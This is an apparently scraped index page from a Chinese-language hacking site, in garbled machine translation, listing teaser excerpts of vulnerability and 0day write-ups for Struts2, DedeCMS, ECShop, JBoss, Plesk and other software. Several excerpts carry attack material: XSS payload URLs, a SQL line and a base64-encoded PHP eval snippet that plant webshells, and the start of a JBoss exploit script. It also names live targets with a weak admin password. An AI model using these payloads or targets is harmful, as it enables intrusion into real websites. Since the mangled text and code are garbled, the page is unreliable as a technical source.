struts2 latest vulnerability S2-0 1 6, S2-0 1 7 patch programme-vulnerability warning-the black bar safety net

Yesterday struts2 blast a good deal of vulnerability, with know Brother words to say is:“this afternoon the whole Chinese hacking ring like mad started to use this exploit black site, everyone can feel it.” See under the clouds the two days of data: ! Related reports: The disaster: the Chinese...

Use Sqlmap to test MetInfo enterprise website management system MySql injection vulnerability-vulnerability warning-the black bar safety net

The last fork fork tell Sqlmap simple injection access database tutorial, this time we talk about the MySql database MetInfo is a powerful enterprise web site management system, using PHP+Mysql architecture. Fork fork download The is MetInfo 5.1.5 the free version, let's not pick, not analysis of...

Struts2 then blast remote code execution vulnerability S2-0 1 6-a vulnerability warning-the black bar safety net

Struts and blast remote code execution vulnerability! In this vulnerability, the attacker can manipulate the parameters of the remote execution of malicious code. The Struts 2.3.15.1 the previous version, the parameters of the action the value of the redirect and redirectAction is not properly...

Struts2 latest remote code execution vulnerability S2-0 1 6 official patch analysis-vulnerability warning-the black bar safety net

Contrast a bit stucts svn, in fact, only modified one file ! For the action of the prefix, an increase cleanactionname function, filtering the ognl implementation, For the redirect and redirectaction prefix, the direct removal. !...

Simplog multiple pieces of vulnerability analysis-vulnerability warning-the black bar safety net

Late night bored go find some CMS for mining vulnerability, listening to friends say simplog there are many vulnerabilities, that I also the next to see his program exactly how unsafe. Due to time problems yourself from the code analysis, and test that part of it is not written!!! Coming to the...

File vulnerability analysis in the locate the file field method-vulnerability warning-the black bar safety net

Today looking at the snow on the to see someone ask how to control the file format documentation, and debugging the analysis program being parsed is what structure? Here summarizes a few methods, welcome to Supplement, but sometimes still need to rely on experience. a taint tracking analysis: the...

（CVE-2 0 1 2-1 8 7 5 Using Metasploit to test the latest of the IE8 vulnerability-vulnerability warning-the black bar safety net

Originally wanted to use the Metasploit Console to test, but the console how also could not find this exploit, temporarily don't know the reason, and later use msfgui to test. 1, rb the File Download address:...

Web application security vulnerability analysis and prevention（ASP article-the vulnerability warning-the black bar safety net

In previous articles we have for common Web security vulnerabilities and prevention methods are analyzed and described, and learn to Web security vulnerability of the website's security operations as well as corporate sensitive information anti-leakage effect is huge, so effective against Web...

Web application security vulnerability analysis and prevention（PHP article-the vulnerability warning-the black bar safety net

PHP is the current Internet environment in the most mainstream of dynamic website development script language, using PHP development of Web application security is also a hacker like the focus of attention. This article will by source code analysis a way to use PHP to write Web application securi...

DEDECMS v5. 7(2013-06-07) xss+csrf 0day-vulnerability warning-the black bar safety net

Bookmark management existxss+csrf http://localhost/dedecms/member/flinkmain.php xss:http://localhost/dedecms/member/flinkmain.php?dopost=addnew&title=test' onmouseover=alert1;'&url=test' onmouseover=alert1;' CSRF:img...

Cherry enterprise website management system V3. 1 vulnerability-the vulnerability warning-the black bar safety net

Vulnerability file: newscategory. asp Set rs = server. CreateObject"adodb. recordset" sql ="select from news where category="&request. QueryString"id"&" order by id desc" rs. Open sql, conn, 1, 1 If rs. EOF Then Vulnerability code: not filtered Vulnerability file admindelete. asp Vulnerability...

Qi Bo cms back-end database tool at the filter is not strictly the actuator can be written in a word-vulnerability and early warning-the black bar safety net

If your account password is leaked then you're in danger. in the background can directly get a webshell The background for the convenience of webmasters to have a database tool where the implementation Select '%execute request"value"%' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp'; Just write t...

Cherry enterprise cms V3. 1 SQL injection and arbitrary administrator account password change. Delete-bug warning-the black bar safety net

Cherry enterprise website management system V3. 1 SQL injectionand any administrator account password to modify. Delete vulnerability Program download address: http://down.chinaz.com/soft/31227.htm Vulnerability file: newscategory. asp Set rs = server. CreateObject"adodb. recordset" sql ="select...

metinfo(m topology)of the enterprise website management system SQL injection vulnerability-vulnerability warning-the black bar safety net

The vulnerability occurs in the member/getpassword. php with admin/admin/getpassword. php file if$p $array = explode'.', base64decode$p; $sql="SELECT FROM $metadmintable WHERE adminid='".$ array0."'"; $sqlarray = $db-getone$sql; base64decode$pafter the value with explode split and then submitted ...

mlecms multi-language enterprise website management system v2. 3 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

Vulnerability defects: the storage typexss 漏洞 文件 :links.php Loopholes in the application link at the website name and logo at the address, because the site name“webname”is post GET and didn't do the filter soxssappeared! Using description: xsshit the backend to get webshell Background get a shell...

La Cala is another sub-Station command execution vulnerabilities included cross-site threat-vulnerability warning-the black bar safety net

Brief description: Test La Cala a sub-Station, and found the pull Station using THINKPHP open source framework, there is still some risk. Does not affect the customer data, the hazard rating. Detailed description: 1 Nginx service end is not a reasonable configuration to cause arbitrary PHP script...

The word Chrome word plugin xss vulnerability-vulnerability warning-the black bar safety net

Brief description: Youdao dictionary zoned word translation chrome plug-in, select the special structure of the text, for word translation, and executes the associated code. Detailed description: Maybe you just want to copy the above code,and select them, does not want zoned word translation Youd...

1 3 9 mailbox of the user experience center of the back of the weak password vulnerability warning-the black bar safety net

Brief description: Administrator password security awareness is weak, password is too simple. Detailed description: The background of the page easily obtained. http://uec.mail.10086.cn/admin/login.jsp User password: admin directly to the background, Vulnerability proof: ! !...

Taobao fraud and a module XSS vulnerabilities can steal user cookies-vulnerability warning-the black bar safety net

First let's look at TaobaoXSSvulnerability ! Taobao decoration can invoke a third-party module, this means that this third party template if there is a vulnerability even being invaded are likely implicated in Taobao shop! Edit the third party Module, added toXSScode, and then the shop calls ! Op...

bluecms the latest version of the double-byte universal password into the background-bug warning-the black bar safety net

Brief description: bluecms the latest version i.e., v1. 6sp1,processing of login authentication when the variables are single quotes escaped, but can be used gbk double-byte coding the closing single quote and then comment to enter the background Detailed description: bluecms verify the login cod...

Rain Nan travel network service management system v2013. 6. 1 1 The newest vulnerabilities 0day-vulnerability warning-the black bar safety net

Vulnerability-1 Vulnerability type: the storage typexss Code file: LstBook. Asp Detail code: ------------------------------------------------ If action="addbook" Then If TrimRequest"xm"="" Then Call alert"name cannot be empty","-1" End If If TrimRequest"sj"="" Then Call alert"phone can not be...

metinfo enterprise website management system SQL injection vulnerability-vulnerability warning-the black bar safety net

Brief description: metinfo enterprise website management systemSQL injectionvulnerability Detailed description: member/getpassword. php with admin/admin/getpassword. php file if$p $array = explode'.', base64decode$p; $sql="SELECT FROM $metadmintable WHERE adminid='".$ array0."'"; $sqlarray =...

3 9 Health a sub-Station SQL injection-vulnerability warning-the black bar safety net

Detailed description: http://nutrition.39.net/index.aspx?id=996 Vulnerability to prove: !...

Ali cloud according to the amount of payment logic vulnerabilities a gold（cheap enjoy Super host-vulnerability warning-the black bar safety net

To Description: Ali cloud cloud host purchase logic design is not tight, after a base64 encoding of the data can be tampered with, and the rear end will accept the tampering of the data, and can forge a super host. The need to spend 2 0 1 5 $ 8/month host only need 9 3 6 Yuan/month（see Figure） ! ...

53KF dns zone transfer vulnerability-vulnerability warning-the black bar safety net

Detailed description: 53KF business online platform dns-domain transfer vulnerability Vulnerability proof: root@kali: dnsenum 53kf.com ! !...

3 6 0 Forum stored xss can be introduced into the virus hung it-vulnerability warning-the black bar safety net

1 vulnerability location: 3 6 0 Forum any plate, post, reply in the rich text editor. 2 Use code:! 3 vulnerability hazards: pass to kill 3 6 0 all Forum sections. Due to China's current IE6 users is fairly large, the most recent statistics for the 2 1. 3 per cent. So the harm is pretty large, so...

Network fun online shopping system flagship version v6. 7 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

I haven't play the audit, so download the source code find axssto play....!!! Vulnerability type: persistentxss Registry there are storedxss Specific code: rs"username"=trimrequest"username" rs"userpassword"=md5trimrequest"userpassword" rs"useremail"=trimrequest"useremail"...

Loser talking about the router vulnerability the Mining（Science English-a vulnerability warning-the black bar safety net

Router vulnerability mining exploration and Science Editor: the dusk url: www.arc5ch.com Without copyright no jj Want to in the country looking for some route of penetration of the documentary, but still wood what the result is tonight to a domestic routing manufacturers to submit some of the...

DLL hijacking vulnerability analysis-vulnerability warning-the black bar safety net

Hack in the hands of the new weapons Eric 2 0 1 2 early release of China 2 0 1 1 in the second half of the personal Internet Security report, containing such a data: 2 0 1 1 in the second half of ten hot points of the Trojans, where 5 is the use of DLL hijacking vulnerability to system damage. DL...

nginx url decoded trigger the waf vulnerability-vulnerability warning-the black bar safety net

Last year found the ngx a bug, and until recently air only wrote this post. Nginx ngxunescapeuri function in the processing of url decode when not follow the standard url decode, causing a range use this function to decode the waf There are bypass vulnerability The problem occurs in the function ...

The United States VPS management system SolusVM 1.13.03 SQL injection vulnerability with exp-a vulnerability warning-the black bar safety net

SolusVM software is a powerful graphical user interface for VPS management system that can simultaneously manage three kinds of Virtualization Technology: OpenVZ ,Xen Paravirtualization and Xen HVM in. The use of this software open us VPS customer, will feel he is very safe and convenient. Poor...

Easy to buy program SQL injection vulnerability-vulnerability warning-the black bar safety net

Easy to buy management system is a positioning high-end market group buying content management system,to the lowest cost,minimal human input in the shortest time to set up a fully functional, excellent performance, huge size and easy to maintain website platform. Not filtered lead injection ! ! T...

easethink payment. php injection vulnerability analysis attached to the use of the EXP-bug warning-the black bar safety net

Vulnerability author: leehenwu 0 1 vulnerability analysis Vulnerabilities in payment. php file elseif$REQUEST'act'=='return' //payment jump back to page $classname = $REQUEST'classname'; $paymentinfo = $GLOBALS'db'-getRowCached"select from ". DBPREFIX."payment where classname = '".$ classname."'"...

6 on a neglected Microsoft vulnerability MS13-0 5 1--Note the large cattle of the analysis process-exploit warning-the black bar safety net

Foreign media once again bashing Microsoft patch rating, only as advice, not as a Bible. Last week Microsoft released 6 month patch, wherein MS13 - 0 5 1 rating is important, on the grounds that the vulnerability requires user interaction, and is currently found to be utilized in the attack is on...

Android ICS adb debugging tools System Restore directory traversal vulnerability, can provide right-vulnerability warning-the black bar safety net

原 漏洞 信息 来自 于 [email protected] Vulnerability description: adb Android Debug Bridge backup/restore option allows you to backup and restore applications, including system applications. Backup files to tar. the zlib PACKAGE, files the default suffix is . ab. When a backup contains a file, the file...

ECShop v2. 7. 3 RELEASE 2 0 1 2 1 1 0 6 EXP-vulnerability warning-the black bar safety net

-- coding:gbk - import httplib2 from urllib import urlencode def PostDataurl: url=url+'/admin/template. php? act=updatelibrary' Defined to submit the data html='if fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2Z1Y2tdktsgpz5mdwnr1 6 0 8 6/if'...

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

PHPCMS V9 arbitrary file include vulnerability-vulnerability warning-the black bar safety net

Brief description: Somewhere considered not rigorous, it is possible to cause the file containing the vulnerability. Use Conditions: registerglobal=ON Detailed description: Vulnerability file:/plugin.php Vulnerability code: 2 2 row Trigger conditions: registerglobal=ON Code fragment: 1 5 to 2 2...

New network vulnerabilities of the VPS automated production systems many VPS password leak-vulnerability warning-the black bar safety net

The new network of the VPS automated production system column of the directory can view the system log file From the log file to find the background of the account after the burp blasting is actually a weak password The background relates to the user of the vps password log leaked url:...

SiteServer cms Cookie spoofing vulnerability-vulnerability warning-the black bar safety net

Brief description: . net platform SiteServer cms he the powerful is unquestionable, but the problem is also many, The discovery of the cookies tricking a gold after testing, 3.44 above version of the pass to kill Detailed description: ! Local set up an environment and then log in to grab the...

Youku open platform storage type XSS script attack vulnerability success hijacking the background-bug warning-the black bar safety net

Youku open platform in the“Create an application”feature of the plurality of fields, not from the client to submit the variables into the database, the output of the safety of the escape process. http://open.youku.com/app/create ! Lead can be directly stepped into the background. Vulnerability...

Easy to shoot global the WEB-INF directory unauthorized access to sensitive information disclosure-vulnerability warning-the black bar safety net

The WEB-INF directory unauthorized access to the web. xml disclosure of sensitive information Detailed description: Original link http://www. epailive. com/bottomActionbottominclude. do? fileName=about. jsp fileName=not a special character, the WEB-INF directory to do the filtering Test Link...

China digital IDC Management Platform is not weighted limit authentication-vulnerability warning-the black bar safety net

China digital IDC management platform to address leaks lead to a lot of ip leakage Looks like CE Dongli, new network are China digital's Detailed description: http://119.10.114.29/index1.php http://123.100.0.42/ !...

Jboss Application Server remote code execution vulnerability 0day-vulnerability warning-the black bar safety net

Jboss Application Server remote code execution vulnerability 0day Tags: vulnerability 0day JBoss AS Remote Exploit by Kingcope use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage print “JBoss AS Remote Exploit by Kingcope usage: perl jboss.pl “;print “example: perl...

EmpireCMS 6.0 management rights GETSHELL-a vulnerability warning-the black bar safety net

Analysis process : eclassfunctions.php 2 6 0 9 row ReUserjs function. function ReUserjs$jsr,$addpath global $empire,$publicr; DoFileMkDir$addpath.$ jsr 'jsfilename';//build directory //Obtain the js template $jstemptext=GetTheJstemp$jsr jstempid; //remove the set Js array...

ECShop shop system the latest versions contain vulnerabilities-vulnerability warning-the black bar safety net

This hole, actually I on 2 0 1 2 year 1 month of time to see ecshop on the analysis, originally due to feeling tasteless you didn't put out. Just under the official website latest version, didn't think also exist. Vulnerability file:/demo/index.php | 1 | if ! empty$POST'lang' //if not empty ---|-...

Wind news. net version arbitrary code execution(the official has demo)-vulnerability warning-the black bar safety net

Registered users, published articles, capture modification of the package, killed First look at the uploads directory has no execute permissions, and found no, it seems to be in the bag. ! 1 ! 2 ! 3 ! 4...

Kerry friends of Science and technology cms upload vulnerability and fix-vulnerability warning-the black bar safety net

The program uses the upload page uploadfile. asp not be verified, leading to the establishment of malformations directory upload image the Trojans get a shell vulnerability. exp: the http://www.8090sec.com/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1. mad. asp His original Upload...

Plesk hosting management software remote get shell 0day-vulnerability warning-the black bar safety net

6 month 5 days late, the Great God king cope in foreign countries well-known mailing list seclists burst Plesk latest remote exploit 0day and gives a perl version of the exp. On Plesk with: Plesk is a cross-platform host Management Control Panel software, is a server virtualization and automation...